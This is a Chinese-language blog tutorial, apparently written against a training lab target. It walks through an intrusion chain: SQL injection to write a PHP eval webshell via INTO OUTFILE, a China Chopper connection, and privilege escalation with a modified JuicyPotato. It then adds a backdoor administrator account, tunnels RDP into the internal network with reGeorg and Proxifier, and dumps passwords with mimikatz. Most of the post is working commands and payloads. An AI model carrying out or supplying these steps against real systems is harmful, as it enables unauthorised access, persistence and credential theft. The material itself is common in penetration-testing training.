IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> sql获得权限,内网穿透获取管理员密码(小宇特详解) -> 正文阅读

[PHP知识库]sql获得权限,内网穿透获取管理员密码(小宇特详解)

sql获得权限内网穿透获取管理员密码

SQL注入拿webshell(into outfile into dumpfle)

先输入?id=1和?id=2

在这里插入图片描述
在这里插入图片描述

如果id=1能回显 id=2不能回显,id=2-1能回显,说明有sql注入

在这里插入图片描述

sql注入其实可以写webshell的

into outfile 导出文件

into dumpfile 导出文件

将查询的结果导出成文件

http://afsgr16-b1ferw.aqlab.cn/?id=1 union select 1,2 into outfile ‘C:/phpStudy/WWW/123456.txt’

在这里插入图片描述

webshell管理工具

菜刀,蚁剑=>一句话木马直接相连(默认流量没有加密)

冰蝎,哥斯拉=>流量有加密,只能上传他自己的木马

这里在sql注入点注入一句话木马

http://afsgr16-b1ferw.aqlab.cn/?id=1 union select 1,"<?php eval($_REQUEST[8])?>" into outfile ‘C:/phpStudy/WWW/4448.php’

在这里插入图片描述

提权辅助页面,查询系统可能存在的漏洞

这里将直接用菜刀连接,连接密码为8,连接后打开虚拟终端,这里先看一下权限whoami

在这里插入图片描述

当我们遇到不是管理员权限的时候我们肯定需要提权

1.利用目标主机上的服务提权(目标主机运行的xxx软件,但是这个软件有漏洞可以利用)

2.利用web服务(一台机器上可能有多个网站,多个web容器)

3.利用windows漏洞systeminfo找补丁,找没有打的补丁

在虚拟终端中输入systeminfo来查看系统信息

在这里插入图片描述

这个是一个windows提权辅助工具https://i.hacking8.com/tiquan/

在这里插入图片描述

将systeminfo查到的已打的补丁,查询得到没有打的补丁。然后根据靶机的型号来在github上找到这个cve的漏洞进行操作。

利用魔改版烂土豆提权

这里有一个提权神器。烂土豆。这里可以通过烂土豆来提权

将烂土豆的exe文件,拖入到目录中改名(因为这里的原来的文件名太长了)。在虚拟终端中打开1111.exe(这里改成了1111.exe)。

在这里插入图片描述

直接输入1111.exe -p "whoami"来进行提权。

在这里插入图片描述

这里已经成了系统权限。

这里通过烂土豆来用系统命令来进行生成一个新的用户

在这里插入图片描述

这里可以在网上搜索windows cmd修改管理员权限

net localgroup administrators 用户名 /add

这里1111.exe -p “net localgroup administrators xhy /add”

在这里插入图片描述

这里已经提权了

内网传透(通过reg来设置中转站,然后用全局代理远程桌面)

远程桌面只有管理员可以连接

netstat -ano来查看端口

在这里插入图片描述

cmd命令mstrc远程桌面连接

在这里插入图片描述

你在这里将创建的管理员账号输入,发现登不上。这里是什么原因呢。刚刚咱们找到的那台机器是windows2008,现在是2003这是为什么呢

这就像域名的核心是ip,一个ip底下可能有多台服务器,这些服务器就共用了一个ip,这个的核心是端口映射,这里解释一下什么是端口映射,相当于是有3个主机ABC连在了一个路由器上,这里说网关吧,假如A主机开的3389端口,而B主机不开的3389端口,这样从外网你用3389访问,网关就会让你访问A主机,是永远不可能访问到B主机的。

这里使用了php作为了中间的媒介(PHP可以帮助我们发起请求)

这里使用正向连接:请求=>php=>发送出去 这里的php就相当于一个间谍

将后缀为php的reGeorg这个tunnel.nosocket.php放到菜刀的目录中,也就是网站的目录中。

在这里插入图片描述

改个好写的名字访问一下

在这里插入图片描述

出现这种样子说明就ok了

在这个目录下cmd一下,这里运行python环境,这里我的是py2,这个只有py2能运行,py3就不行了,这个reGrorg是基于py2的。这里输入python reGeorgSocksProxy.py

在这里插入图片描述

然后这里会有一些指令,python reGeorgSocksProxy.py -u http://afsgr16-b1ferw.aqlab.cn/2222.php -p 5242(-u后加那个文件的位置,-p后加端口映射的端口)

在这里插入图片描述

等这个运行开以后还得用一个全局流量代理将3389远程桌面连接的请求发到5242端口

全局代理

这里的全局代理用的是Proxifier。

在这里插入图片描述

点开配置文件的代理服务器,地址设置为本地127.0.0.1 端口为5242 协议为socks5。然后检查。

在这里插入图片描述

接下来这里添加一个规则,名称就写mstsc,应用程序是mstsc.exe,这里的动作用代理也就是proxy SOCKS5 127.0.0.1另一个direct的意思是不拦截。

在这里插入图片描述

点击确定。

在菜刀的虚拟终端中,ipconfig一下,发现主机是10.0.1.4

mstsc远程连接一下,这里用自己添加的管理员账户xhy 和 A1B2C3!.Qa登录

登录后用管理员权限打开2.exe

log生成日志

在这里插入图片描述

提升权限privilege :: debug

抓取密码sekurlsa :: logonpasswords

在这里插入图片描述

在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-08-02 10:36:11  更:2021-08-02 10:36:29 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年5日历 -2024/5/5 3:14:31-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码